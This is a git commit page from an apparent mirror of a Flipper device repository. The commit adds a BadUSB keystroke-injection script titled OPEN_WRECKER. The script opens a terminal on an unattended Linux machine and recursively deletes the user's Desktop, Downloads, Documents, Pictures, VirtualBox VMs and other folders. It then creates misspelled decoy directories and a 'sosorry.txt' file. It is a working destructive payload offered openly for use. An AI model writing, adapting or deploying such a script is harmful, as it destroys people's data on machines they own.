mirror of
https://github.com/UberGuidoZ/Flipper.git
synced 2024-12-22 06:20:12 +00:00
Create Open_WreckerV1_Badusb_Linux
This commit is contained in:
parent
83e9b2424f
commit
6af99b653c
21
Open_WreckerV1_Badusb_Linux
Normal file
21
Open_WreckerV1_Badusb_Linux
Normal file
@ -0,0 +1,21 @@
|
||||
REM Author: FLIZZ3R
|
||||
REM TITLE: OPEN_WRECKER
|
||||
REM OBJECTIVE: wipe open linux machines Directories then create dummy directories and sorry text file
|
||||
|
||||
DELAY 500
|
||||
WINDOWS d
|
||||
DELAY 300
|
||||
CTRL-ALT t
|
||||
DELAY 1500
|
||||
STRING rm -r Desktop Downloads Pictures snap Documents Music Public Templates 'VirtualBox VMs'
|
||||
ENTER
|
||||
DELAY 1500
|
||||
STRING mkdir Deskop downloadz Pics Dox Music Public TEMPS Vms
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING cd Deskop
|
||||
ENTER
|
||||
DELAY 500
|
||||
STRING touch sosorry.txt
|
||||
ENTER
|
||||
ALT F4
|
Loading…
Reference in New Issue
Block a user